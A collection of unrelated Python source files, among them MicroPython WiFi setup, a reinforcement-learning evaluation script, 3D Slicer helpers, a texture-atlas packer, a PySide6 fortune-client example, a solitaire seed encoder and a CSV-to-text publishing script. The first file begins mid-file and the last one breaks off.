ex. https://maps.gsi.go.jp/#13/35.713556/139.750385/
"""
if self.level is None or self.x is None or self.y is None:
return ''
url = 'https://maps.gsi.go.jp/#{level:d}/{lat:.6f}/{lon:.6f}/'
return url.format(
level=9 + self.level,
lat=self.y, lon=self.x)
def get_googlemap_link(self) -> str:
"""
Returns the URL for GSI Map with parameters.
ex. https://maps.google.com/maps?q=24.197611,120.780512&z=18
"""
if self.level is None or self.x is None or self.y is None:
return ''
url = 'https://maps.google.com/maps?q={lat:.6f},{lon:.6f}&z={level:d}'
return url.format(
level=9 + self.level,
lat=self.y, lon=self.x)
|
import json
import network
import webrepl
from machine import Pin
import machine
import time
class WIFI_UTIL:
def __init__(self, AP_FLAG=27, SIGNAL=33, LED=13, silent=True):
self.AP_flag = Pin(AP_FLAG, Pin.IN)
time.sleep(2)
self.button = None
self.butpin = AP_FLAG
self.ap = network.WLAN(network.AP_IF)
# LED
self.led = Pin(LED, Pin.OUT)
# SIGNAL
self.sig = Pin(33, Pin.OUT)
self.sig.value(0)
# AP interrupt config
self.irq_busy = False
# STA CONFIG FILE
self.STA_FILE = 'wifi_.config'
# AP CONFIG FILE
self.AP_FILE = 'ap_.config'
self.silent = silent
if not self.silent:
print('WLAN UTIL INITIATED')
def toggle_AP_usb(self, x):
if self.irq_busy:
return
else:
self.irq_busy = True
if self.AP_flag.value() == 0: # reverse op == 0
for i in range(4):
self.led.value(not self.led.value())
time.sleep_ms(250)
if self.ap.active() is False:
for i in range(4):
self.led.value(not self.led.value())
time.sleep_ms(250)
self.AP_flag.init(Pin.OUT)
time.sleep_ms(1000)
self.AP_flag.value(0) # reverse op == 1
self.AP_flag.init(Pin.IN, Pin.PULL_UP)
print('Enabling AP...')
machine.reset()
else:
self.ap.active(False)
self.AP_flag.init(Pin.OUT)
time.sleep_ms(1000)
self.AP_flag.value(0) # reverse op == 1
self.AP_flag.init(Pin.IN, Pin.PULL_DOWN)
print(self.AP_flag.value())
print('Disabling AP...')
time.sleep(1)
machine.reset()
self.irq_busy = False
def ap_enable_int(self):
# AP Interrupt config
self.button = Pin(self.butpin, Pin.OUT)
self.button.init(Pin.IN, Pin.PULL_UP)
print(self.button.value())
self.button.irq(trigger=Pin.IRQ_FALLING, handler=self.toggle_AP_usb)
def STA_conn(self):
# LOAD WIFI_.CONFIG
with open(self.STA_FILE, 'r') as wifi_file:
wifi_config = json.load(wifi_file)
wlan = network.WLAN(network.STA_IF)
wlan.active(True)
if not wlan.isconnected():
print('connecting to network...')
wlan.connect(wifi_config['ssid'], wifi_config['password'])
while not wlan.isconnected():
pass
print('Connected to {}'.format(wifi_config['ssid']))
print('Network Config:', wlan.ifconfig())
webrepl.start()
for i in range(10):
self.led.value(not self.led.value())
time.sleep(0.2)
self.led.value(False)
def AP_conn(self):
with open(self.AP_FILE, 'r') as ap_file:
ap_config = json.load(ap_file) # be aware load upy, loads py
self.ap.active(True)
self.ap.config(essid=ap_config['ssid'],
authmode=network.AUTH_WPA_WPA2_PSK,
password=ap_config['password'])
print('Acces point configurated: {}'.format(ap_config['ssid']))
print(self.ap.ifconfig())
webrepl.start()
for i in range(10):
self.led.value(not self.led.value())
time.sleep(0.2)
self.led.value(False)
def ap_config(self, ssid, passw):
ap_conf = dict(ssid=ssid, password=<PASSWORD>)
with open(self.AP_FILE, 'w') as ap_file:
ap_file.write(json.dumps(ap_conf))
if not self.silent:
print('AP: {} configurated'.format(ssid))
def sta_config(self, ssid, passw):
sta_conf = dict(ssid=ssid, password=<PASSWORD>)
with open(self.STA_FILE, 'w') as sta_file:
sta_file.write(json.dumps(sta_conf))
if not self.silent:
print('DEFAULT WLAN: {} configurated'.format(ssid))
|
<reponame>yooceii/HardRLWithYoutube
import tensorflow as tf
import argparse
from level_selector import *
from model import Model
from runner import Runner
from env import *
from baselines.a2c.utils import make_path
from baselines.a2c.policies import CnnPolicy
from baselines.common import set_global_seeds
from baselines.ppo2.policies import CnnPolicy, LstmPolicy, LnLstmPolicy
def eval(model, env, nsteps=5, runs=100, render=False, level_selector=None):
runner = Runner(env, model, nsteps=nsteps, gamma=0, render=render)
while len(runner.final_rewards) < runs:
obs, states, rewards, masks, actions, values = runner.run()
scores = runner.final_rewards[:runs]
mean_score = np.mean(scores)
std_score = np.std(scores)
return scores
def test_on(game, level, selector, experiment_name, experiment_id, policy, num_envs=1, seed=0, runs=1000, render=False):
# Environment name
env_id = "gvgai-" + game + "-lvl" + str(level) + "-v0"
# Test name
test_name = game
if selector is not None:
test_name += "-ls-" + selector
else:
test_name += "-lvl-" + str(level)
print("Test name: " + test_name)
print('Training name: ' + experiment_name)
print("Training id: " + experiment_id)
# Level selector
level_selector = LevelSelector.get_selector(selector, game, level_path)
env = make_gvgai_env(env_id, num_envs, seed, level_selector=level_selector)
# Main plots per experiment
mean_scores = []
std_scores = []
model_folder = './results/' + experiment_name + '/models/' + experiment_id + "/"
# Find number of steps for last model
steps = -1
for model_meta_name in glob.iglob(model_folder + '*.meta'):
s = int(model_meta_name.split('.meta')[0].split('/')[-1].split("-")[1])
if s > steps:
steps = s
if policy == 'cnn':
policy_fn = CnnPolicy
elif policy == 'lstm':
policy_fn = LstmPolicy
elif policy == 'lnlstm':
policy_fn = LnLstmPolicy
tf.reset_default_graph()
ob_space = env.observation_space
ac_space = env.action_space
model = Model(policy=policy_fn, ob_space=ob_space, ac_space=ac_space, nenvs=num_envs, nsteps=5)
try:
model.load(model_folder, steps)
except Exception as e:
print(e)
env.close()
return
eval(model, env, runs=runs, render=render, level_selector=level_selector)
env.close()
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--policy', help='Policy architecture', choices=['cnn', 'lstm', 'lnlstm'], default='cnn')
parser.add_argument('--runs', help='Number of runs for each model', type=int, default=100)
parser.add_argument('--num-envs', help='Number of environments/workers to run in parallel', type=int, default=10)
parser.add_argument('--game', help='Game name (default=zelda)', default='zelda')
parser.add_argument('--seed', help='RNG seed', type=int, default=0)
parser.add_argument('--experiment-name', help='Name of the experiment to evaluate, e.g. zelda-ls-pcg-random (default=None -> all)', default=None)
parser.add_argument('--experiment-id', help='Id of the experiment to evaluate')
parser.add_argument('--level', help='Level (integer) to train on', type=int, default=0)
parser.add_argument('--selector',
help='Level selector to use in training - will ignore the level argument if set (default: None)',
choices=[None] + LevelSelector.available, default=None)
parser.add_argument('--render', action='store_true',
help='Render screen (default: False)')
args = parser.parse_args()
test_on(args.game, args.level, args.selector, experiment_name=args.experiment_name, experiment_id=args.experiment_id, policy=args.policy, runs=args.runs, seed=args.seed, num_envs=args.num_envs, render=args.render)
if __name__ == '__main__':
main()
|
<filename>SlicerPlayground/playground_utils.py
"""
Utility fuctions for Slicer Playground.
These functions are copies from notebooks where they were created to enable reuse.
"""
import numpy as np
import vtk
import slicer
from emoji import UNICODE_EMOJI
def create_np_text_img(text: str, size: tuple = (128, 128),
font_size: int = 24, emoj_size: int = 64) -> np.ndarray:
"""
Create a numpy text image.
Creates a text-on-background image and returns it as a flat 3D numpy array.
Check font paths when copying this function.
The font paths should point to actual true-type font files on the disk.
:param text: Input unicode text.
:type text: str
:param size: Target image size (optional).
:type size: tuple
:param font_size: Font size of the text (optional).
:type font_size: int
:returns: Flat 3D numpy array containing pixel values.
:rtype: np.ndarray
"""
from PIL import Image, ImageDraw, ImageFont
if bool(set(text).intersection(UNICODE_EMOJI)):
font_path = "/System/Library/Fonts/Apple Color Emoji.ttc"
font = ImageFont.truetype(font_path, emoj_size)
else:
font_path = "/System/Library/Fonts/Microsoft/Arial Black.ttf"
font = ImageFont.truetype(font_path, font_size)
text_width, text_height = font.getsize(text)
text_image = Image.new('I', size, "black")
draw = ImageDraw.Draw(text_image)
draw.text((text_width/2, text_height/2), text, 'white', font)
return np.asarray(text_image).reshape(*size, 1)
def show_slice_in_slice_view(volumeNode: slicer.vtkMRMLScalarVolumeNode,
sliceNum: int = 0,
sliceView: str = 'Red'):
"""
Render a numpy image on slice view.
:param volumeNode: The volume node
:type volumeNode: vtkMRMLScalarVolumeNode
:param sliceNum: The number of the slice that we want to show. Optional. Defaults to 0.
:type sliceNum: int
:param sliceView: One of default slice views ('Red', 'Green', 'Yellow')
:type sliceView: str
"""
sliceViewWidget = slicer.app.layoutManager().sliceWidget(sliceView)
sliceWidgetLogic = sliceViewWidget.sliceLogic()
sliceWidgetLogic.GetSliceCompositeNode().SetBackgroundVolumeID(volumeNode.GetID())
sliceWidgetLogic.FitSliceToAll()
sliceWidgetLogic.SetSliceOffset(sliceNum)
pass
def fit_slice_view(sliceView: str = 'all'):
"""
Fit slice field of view to data.
:param sliceView: Either one of default slice views ['Red', 'Green', 'Yellow'] or 'all'.
:type sliceView: str
"""
if sliceView == 'all':
sliceView = slicer.app.layoutManager().sliceViewNames()
elif sliceView in ['Red', 'Yellow', 'Green']:
sliceView = [sliceView]
for sv in sliceView:
sliceViewWidget = slicer.app.layoutManager().sliceWidget(sv)
sliceWidgetLogic = sliceViewWidget.sliceLogic()
sliceWidgetLogic.FitSliceToAll()
pass
def log_image_info(volume: slicer.vtkMRMLScalarVolumeNode):
"""Log basic image information to console."""
print(f'Volume name: {volume.GetName()}')
print(f'Origin: {volume.GetOrigin()}')
print(f'Spacing: {volume.GetSpacing()}')
print(f'Dimensions: {volume.GetImageData().GetDimensions()}\n')
def layout_3_volumes(volumeList: list):
"""Prepare 3x3 layout with 3 volumes in slice views."""
ORIENTATIONS = ["Axial", "Sagittal", "Coronal"]
THREE_BY_THREE_SLICES = [['Red', 'Yellow', 'Green'],
['Slice4', 'Slice5', 'Slice6'],
['Slice7', 'Slice8', 'Slice9']]
for volumeIndex in range(3):
inputVolumeNode = slicer.mrmlScene.GetFirstNodeByName(volumeList[volumeIndex])
for view in THREE_BY_THREE_SLICES[volumeIndex]:
show_slice_in_slice_view(volumeNode=inputVolumeNode,
sliceView=view)
sliceWidgetNode = slicer.app.layoutManager().sliceWidget(view).mrmlSliceNode()
sliceWidgetNode.SetOrientation(ORIENTATIONS[THREE_BY_THREE_SLICES[volumeIndex].index(view)])
def create_seed_geometry(seedPositions: list, seedSize: int) -> vtk.vtkPolyData:
"""
Create spheres at given positions.
:param seedPositions: A list of lists of seed coordinates [r, a, s]
:type seedPositions: list
:param seedSize: The sphere diameter
:type seedSize: int
:returns: A vtk filter that has vtkPolyData as output
:rtype: vtkPolyData
"""
seedGeometry = vtk.vtkAppendPolyData()
for position in seedPositions:
seed = vtk.vtkSphereSource()
seed.SetCenter(position)
seed.SetRadius(seedSize)
seed.Update()
seedGeometry.AddInputData(seed.GetOutput())
seedGeometry.Update()
return seedGeometry
def rotate_x(geometry: vtk.vtkPolyData,
angle: int,
centerPoint: list) -> vtk.vtkTransformPolyDataFilter:
"""
Rotate vtkPolyData axainst X axis.
Generates a transform filter
and applies rotation to a vtkPolyData input.
:param geometry: The geometry
:type geometry: vtkPolyData
:param angle: The angle (degrees)
:type angle: int
:param centerPoint: Coordinates of the PolyData center
:type centerPoint: list
:returns: A vtk filter that has the rotated data as output.
:rtype: vtkTransformPolyDataFilter
"""
transform = vtk.vtkTransform()
transform.Translate(centerPoint[0], centerPoint[1], centerPoint[2])
transform.RotateX(angle)
transform.Translate(-centerPoint[0], -centerPoint[1], -centerPoint[2])
transformFilter = vtk.vtkTransformPolyDataFilter()
transformFilter.SetTransform(transform)
transformFilter.SetInputConnection(geometry.GetOutputPort())
transformFilter.Update()
return transformFilter
|
<reponame>mborgerson/textureatlas<filename>textureatlas.py
#!/usr/bin/env python
#
# Copyright (c) 2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Texture Atlas and Map File Generation Utility Classes"""
DESCRIPTION = """Packs many smaller images into one larger image, a Texture
Atlas. A companion file (.map), is created that defines where each texture is
mapped in the atlas."""
import PIL.Image as Image
import argparse
import os.path
import re
import shlex
import struct
class Packable(object):
"""A two-dimensional object with position information."""
def __init__(self, width, height):
self._x = 0
self._y = 0
self._width = width
self._height = height
@property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@property
def y(self):
return self._y
@y.setter
def y(self, value):
self._y = value
@property
def width(self):
return self._width
@property
def height(self):
return self._height
@property
def perimeter(self):
return 2*self._width + 2*self._height
class PackRegion(object):
"""A region that two-dimensional Packable objects can be packed into."""
def __init__(self, x, y, width, height):
"""Constructor."""
self._x = x
self._y = y
self._width = width
self._height = height
self._sub1 = None
self._sub2 = None
self._packable = None
@property
def x(self):
return self._x
@property
def y(self):
return self._y
@property
def width(self):
return self._width
@property
def height(self):
return self._height
@property
def packable(self):
return self._packable
def get_all_packables(self):
"""Returns a list of all Packables in this region and sub-regions."""
if self._packable:
return [self._packable] + self._sub1.get_all_packables() + \
self._sub2.get_all_packables()
return []
def pack(self, packable):
"""Pack 2D packable into this region."""
if not self._packable:
# Is there room to pack this?
if (packable.width > self._width) or \
(packable.height > self._height):
return False
# Pack
self._packable = packable
# Set x, y on Packable
self._packable.x = self._x
self._packable.y = self._y
# Create sub-regions
self._sub1 = PackRegion(self._x,
self._y+self._packable.height,
self._packable.width,
self._height-self._packable.height)
self._sub2 = PackRegion(self._x+self._packable.width,
self._y,
self._width-self._packable.width,
self._height)
return True
# Pack into sub-region
return self._sub1.pack(packable) or self._sub2.pack(packable)
class Frame(Packable):
"""An image file that can be packed into a PackRegion."""
def __init__(self, filename):
self._filename = filename
# Determine frame dimensions
image = Image.open(filename)
width, height = image.size
del image
super(Frame, self).__init__(width, height)
@property
def filename(self):
return self._filename
def draw(self, image):
"""Draw this frame into another Image."""
i = Image.open(self._filename)
image.paste(i, (self.x, self.y))
del i
class Texture(object):
"""A collection of one or more frames."""
def __init__(self, name, frames):
self._name = name
self._frames = frames
@property
def name(self):
return self._name
@property
def frames(self):
return self._frames
class TextureAtlas(PackRegion):
"""Texture Atlas generator."""
def __init__(self, width, height):
super(TextureAtlas, self).__init__(0, 0, width, height)
self._textures = []
@property
def textures(self):
return self._textures
def pack(self, texture):
"""Pack a Texture into this atlas."""
self._textures.append(texture)
for frame in texture.frames:
if not super(TextureAtlas, self).pack(frame):
raise Exception('Failed to pack frame %s' % frame.filename)
def write(self, filename, mode):
"""Generates the final texture atlas."""
out = Image.new(mode, (self.width, self.height))
for t in self._textures:
for f in t.frames:
f.draw(out)
out.save(filename)
class TextureAtlasMap(object):
"""Texture Atlas Map file generator."""
def __init__(self, atlas):
self._atlas = atlas
def write(self, fd):
"""Writes the texture atlas map file into file object fd."""
raise Exception('Not Implemented')
class BinaryTextureAtlasMap(TextureAtlasMap):
"""Binary Texture Atlas Map file generator.
The binary atlas map is composed of four sections. The first section is the
header. The second section contains the details of each texture (name,
number of frames, etc.). The third section contains all null-terminated
strings referenced by other sections. The fourth section contains the
coordinates and dimensions of all texture frames.
HEADER FORMAT
Offset Size Description
------ ---- -----------
0 4 Magic ('TEXA' = 0x41584554)
4 4 Texture Atlas Width
8 4 Texture Atlas Height
12 4 Number of Textures
16 4 Texture Section Offset
20 4 Texture Section Size
24 4 String Section Offset
28 4 String Section Size
32 4 Frame Section Offset
36 4 Frame Section Size
TEXTURE FORMAT
Offset Size Description
------ ---- -----------
0 4 Offset to Texture Name in String Section
4 4 Number of Frames
8 4 Offset to first Frame
FRAME FORMAT
Offset Size Description
------ ---- -----------
0 4 X-Coordinate of Frame
4 4 Y-Coordinate of Frame
8 4 Frame Width
12 4 Frame Height
"""
def __init__(self, atlas):
super(BinaryTextureAtlasMap, self).__init__(atlas)
def write(self, fd):
"""Writes the binary texture atlas map file into file object fd."""
# Calculate offset and size of each section
hdr_fmt = 'IIIIIIIII'
hdr_fmt_len = struct.calcsize(hdr_fmt)
hdr_section_len = hdr_fmt_len+4 # Header + Magic
tex_fmt = 'III'
tex_fmt_len = struct.calcsize(tex_fmt)
tex_section_off = hdr_section_len
tex_section_len = len(self._atlas.textures)*tex_fmt_len
str_section_off = tex_section_off+tex_section_len
str_section_len = sum(map(lambda t:len(t.name)+1, self._atlas.textures))
frm_fmt = 'IIII'
frm_fmt_len = struct.calcsize(frm_fmt)
frm_section_off = str_section_off + str_section_len
frm_section_len = sum(map(lambda t:len(t.frames), self._atlas.textures))
frm_section_len *= frm_fmt_len
# Write Header
fd.write('TEXA')
fd.write(struct.pack(hdr_fmt, self._atlas.width,
self._atlas.height,
len(self._atlas.textures),
tex_section_off, tex_section_len,
str_section_off, str_section_len,
frm_section_off, frm_section_len))
# Write Texture Section
str_offset = 0
frm_offset = 0
for t in self._atlas.textures:
fd.write(struct.pack(tex_fmt, str_offset,
len(t.frames),
frm_offset))
str_offset += len(t.name)+1 # +1 for sentinel byte
frm_offset += len(t.frames)*frm_fmt_len
# Write String Section
for t in self._atlas.textures:
fd.write(t.name + '\x00')
# Write Frame Section
for t in self._atlas.textures:
for f in t.frames:
fd.write(struct.pack(frm_fmt, f.x,
f.y,
f.width,
f.height))
def main():
# Parse arguments
arg_parser = argparse.ArgumentParser(description=DESCRIPTION,
formatter_class=argparse.RawDescriptionHelpFormatter)
arg_parser.add_argument('-o',
dest='outfile',
metavar='output-file',
type=str,
default='atlas.png',
help='output filename (atlas.png)')
arg_parser.add_argument('-m', '--mode',
metavar='mode',
type=str,
default='RGBA',
help='output file mode (RGBA)')
arg_parser.add_argument('-s', '--size',
metavar='size',
type=int,
default=512,
help='size of atlas (n x n)')
arg_parser.add_argument('textures',
metavar='texture',
type=str,
nargs='+',
help='filename of texture')
args = arg_parser.parse_args()
filename, ext = os.path.splitext(args.outfile)
if ext == '':
print 'Error: Specify an image extension for outfile (e.g. atlas.png).'
exit(1)
# Parse texture names
textures = []
for texture in args.textures:
# Look for a texture name
matches = re.match('^((\w+)=)?(.+)', texture)
name, frames = matches.group(2), shlex.split(matches.group(3))
# If no name was specified, use the first frame's filename
name = name or os.path.splitext(os.path.basename(frames[0]))[0]
# Build frame objects
frames = [Frame(f) for f in frames]
# Add frames to texture object list
textures.append(Texture(name, frames))
# Sort textures by perimeter size in non-increasing order
textures = sorted(textures, key=lambda i:i.frames[0].perimeter, reverse=True)
# Create the atlas and pack textures in
atlas = TextureAtlas(args.size, args.size)
for texture in textures:
atlas.pack(texture)
# Write atlas and map file
atlas.write(args.outfile, args.mode)
f = open(filename+'.map', 'wb')
BinaryTextureAtlasMap(atlas).write(f)
f.close()
if __name__ == '__main__':
main() |
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing/
##
## This file is part of the Qt for Python examples of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of The Qt Company Ltd nor the names of its
## contributors may be used to endorse or promote products derived
## from this software without specific prior written permission.
##
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
## $QT_END_LICENSE$
##
#############################################################################
"""PySide6 port of the network/blockingfortunclient example from Qt v5.x, originating from PyQt"""
from PySide6.QtCore import (Signal, QDataStream, QMutex, QMutexLocker,
QThread, QWaitCondition)
from PySide6.QtGui import QIntValidator
from PySide6.QtWidgets import (QApplication, QDialogButtonBox, QGridLayout,
QLabel, QLineEdit, QMessageBox, QPushButton, QWidget)
from PySide6.QtNetwork import (QAbstractSocket, QHostAddress, QNetworkInterface,
QTcpSocket)
class FortuneThread(QThread):
new_fortune = Signal(str)
error = Signal(int, str)
def __init__(self, parent=None):
super().__init__(parent)
self.quit = False
self._host_name = ''
self.cond = QWaitCondition()
self.mutex = QMutex()
self.port = 0
def __del__(self):
self.mutex.lock()
self.quit = True
self.cond.wakeOne()
self.mutex.unlock()
self.wait()
def request_new_fortune(self, hostname, port):
locker = QMutexLocker(self.mutex)
self._host_name = hostname
self.port = port
if not self.isRunning():
self.start()
else:
self.cond.wakeOne()
def run(self):
self.mutex.lock()
server_name = self._host_name
server_port = self.port
self.mutex.unlock()
while not self.quit:
timeout = 5 * 1000
socket = QTcpSocket()
socket.connectToHost(server_name, server_port)
if not socket.waitForConnected(timeout):
self.error.emit(socket.error(), socket.errorString())
return
while socket.bytesAvailable() < 2:
if not socket.waitForReadyRead(timeout):
self.error.emit(socket.error(), socket.errorString())
return
instr = QDataStream(socket)
instr.setVersion(QDataStream.Qt_4_0)
block_size = instr.readUInt16()
while socket.bytesAvailable() < block_size:
if not socket.waitForReadyRead(timeout):
self.error.emit(socket.error(), socket.errorString())
return
self.mutex.lock()
fortune = instr.readQString()
self.new_fortune.emit(fortune)
self.cond.wait(self.mutex)
server_name = self._host_name
server_port = self.port
self.mutex.unlock()
class BlockingClient(QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.thread = FortuneThread()
self._current_fortune = ''
host_label = QLabel("&Server name:")
port_label = QLabel("S&erver port:")
for ip_address in QNetworkInterface.allAddresses():
if ip_address != QHostAddress.LocalHost and ip_address.toIPv4Address() != 0:
break
else:
ip_address = QHostAddress(QHostAddress.LocalHost)
ip_address = ip_address.toString()
self._host_line_edit = QLineEdit(ip_address)
self._port_line_edit = QLineEdit()
self._port_line_edit.setValidator(QIntValidator(1, 65535, self))
host_label.setBuddy(self._host_line_edit)
port_label.setBuddy(self._port_line_edit)
self._status_label = QLabel(
"This example requires that you run the Fortune Server example as well.")
self._status_label.setWordWrap(True)
self._get_fortune_button = QPushButton("Get Fortune")
self._get_fortune_button.setDefault(True)
self._get_fortune_button.setEnabled(False)
quit_button = QPushButton("Quit")
button_box = QDialogButtonBox()
button_box.addButton(self._get_fortune_button, QDialogButtonBox.ActionRole)
button_box.addButton(quit_button, QDialogButtonBox.RejectRole)
self._get_fortune_button.clicked.connect(self.request_new_fortune)
quit_button.clicked.connect(self.close)
self._host_line_edit.textChanged.connect(self.enable_get_fortune_button)
self._port_line_edit.textChanged.connect(self.enable_get_fortune_button)
self.thread.new_fortune.connect(self.show_fortune)
self.thread.error.connect(self.display_error)
main_layout = QGridLayout()
main_layout.addWidget(host_label, 0, 0)
main_layout.addWidget(self._host_line_edit, 0, 1)
main_layout.addWidget(port_label, 1, 0)
main_layout.addWidget(self._port_line_edit, 1, 1)
main_layout.addWidget(self._status_label, 2, 0, 1, 2)
main_layout.addWidget(button_box, 3, 0, 1, 2)
self.setLayout(main_layout)
self.setWindowTitle("Blocking Fortune Client")
self._port_line_edit.setFocus()
def request_new_fortune(self):
self._get_fortune_button.setEnabled(False)
self.thread.request_new_fortune(self._host_line_edit.text(),
int(self._port_line_edit.text()))
def show_fortune(self, nextFortune):
if nextFortune == self._current_fortune:
self.request_new_fortune()
return
self._current_fortune = nextFortune
self._status_label.setText(self._current_fortune)
self._get_fortune_button.setEnabled(True)
def display_error(self, socketError, message):
if socketError == QAbstractSocket.HostNotFoundError:
QMessageBox.information(self, "Blocking Fortune Client",
"The host was not found. Please check the host and port "
"settings.")
elif socketError == QAbstractSocket.ConnectionRefusedError:
QMessageBox.information(self, "Blocking Fortune Client",
"The connection was refused by the peer. Make sure the "
"fortune server is running, and check that the host name "
"and port settings are correct.")
else:
QMessageBox.information(self, "Blocking Fortune Client",
f"The following error occurred: {message}.")
self._get_fortune_button.setEnabled(True)
def enable_get_fortune_button(self):
self._get_fortune_button.setEnabled(self._host_line_edit.text() != '' and
self._port_line_edit.text() != '')
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
client = BlockingClient()
client.show()
sys.exit(app.exec())
|
<reponame>avchally/solitaire-python<filename>data/seed_processor.py<gh_stars>1-10
"""
generates a deck of cards based on a given seed
can also generate a seed with a given deck of cards
"""
import random
from .deck_of_cards import Card, Deck
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
SUITS = "HSDC"
RANKS = "A23456789TJQK"
hash_dict = {'a': 'AH', 'b': '2H', 'c': '3H', 'd': '4H', 'e': '5H', 'f': '6H',
'g': '7H', 'h': '8H', 'i': '9H', 'j': 'TH', 'k': 'JH', 'l': 'QH',
'm': 'KH', 'n': 'AS', 'o': '2S', 'p': '3S', 'q': '4S', 'r': '5S',
's': '6S', 't': '7S', 'u': '8S', 'v': '9S', 'w': 'TS', 'x': 'JS',
'y': 'QS', 'z': 'KS', 'A': 'AD', 'B': '2D', 'C': '3D', 'D': '4D',
'E': '5D', 'F': '6D', 'G': '7D', 'H': '8D', 'I': '9D', 'J': 'TD',
'K': 'JD', 'L': 'QD', 'M': 'KD', 'N': 'AC', 'O': '2C', 'P': '3C',
'Q': '4C', 'R': '5C', 'S': '6C', 'T': '7C', 'U': '8C', 'V': '9C',
'W': 'TC', 'X': 'JC', 'Y': 'QC', 'Z': 'KC'}
def generate_hash_dict():
""" only need to run this if hash_dict needs updated above """
hash_dict = {}
i = 0
for suit in SUITS:
for rank in RANKS:
hash_dict[chars[i]] = f'{rank}{suit}'
i += 1
print(hash_dict)
def seed_to_list(seed):
cards = []
for char in seed:
suit = hash_dict[char][1]
rank = hash_dict[char][0]
cards.append(Card(suit, rank))
return cards
def seed_to_deck(seed):
"""
returns a new deck object with cards ordered by the input seed
"""
deck = Deck()
deck.cards = seed_to_list(seed)
return deck
def deck_to_seed(deck):
"""
takes a Deck object and returns its corresponding seed
"""
seed = ''
for card in deck.cards:
for char, crd in hash_dict.items():
if crd == f'{card.get_rank()}{card.get_suit()}':
seed += char
return seed
def generate_random_seed():
temp_list = list(hash_dict.keys())
seed = ''
for i in range(len(temp_list)):
seed += temp_list.pop(random.randrange(len(temp_list)))
return seed
# THIS PROGRAM SHOULD NOT BE RUN AS A SCRIPT
# def main():
# # deck = deck_of_cards.Deck()
# # deck.expose_all()
# # deck.shuffle()
# # print(deck)
# # print(deck_to_seed(deck))
# deck = seed_to_deck('aWRcXysfdHiGnIUVEDKQrwevjokpNqMbSgzZFCJTAuxPhOmLBYlt')
# deck.expose_all()
# print(deck)
# print()
# print()
# print(generate_random_seed())
# if __name__ == '__main__':
# main() |
<filename>volumes-md.py
#-*- coding: utf-8 -*-
# volumes.lu
# md file for each publisher and each book, kirby flavoured
# config
csv_filepath = 'csv/volumes-le-havre-dominant.csv'
# imports
import os
import csv
import sys
from shutil import copyfile
# hifi slugification
sys.path.insert(0, 'libs')
from slughifi import slughifi
# open csv
csv_file = open(csv_filepath, "rt")
reader = csv.reader(csv_file, delimiter=';', quotechar ='"')
publishers = []
publisher_idx = 0
for row_idx, row in enumerate(reader):
publisher = row[0]
title = row[1]
author = row[2]
book_url = row[3]
collection = row[4]
book_ref = row[5]
width = row[7].replace(',','.')
height = row[8].replace(',','.')
depth = row[6].replace(',','.')
credits = row[9]
price = row[10]
idx = row[11]
canonical = row[12]
clr = row[13]
# store publisher
if not row[0] in publishers:
publisher_idx += 1
print('====')
print(publisher)
book_index = 0
publishers.append(publisher)
# create publisher dir
publisher_path = 'publishers/{}_{}'.format(publisher_idx, slughifi(publisher))
if not os.path.exists(publisher_path):
os.makedirs(publisher_path)
# create txt file for publisher
publisher_filename=os.path.join(publisher_path, 'publisher.txt')
publisher_file = open(publisher_filename, "w")
publisher_file.write('Title: {}'.format(publisher))
publisher_file.write("\n\n----\n\n")
publisher_file.write('Publisher_url: {}'.format( "/".join(book_url.split('/')[0:3]) ))
publisher_file.write("\n\n----\n\n")
publisher_file.close()
print('----')
print(title)
book_slug = slughifi(title)
book_path = os.path.join(publisher_path, '{}_{}'.format(book_index, book_slug))
if not os.path.exists(book_path):
os.makedirs(book_path)
book_filename=os.path.join(book_path, 'book.txt')
book_file = open(book_filename, "w")
if "¶" in title :
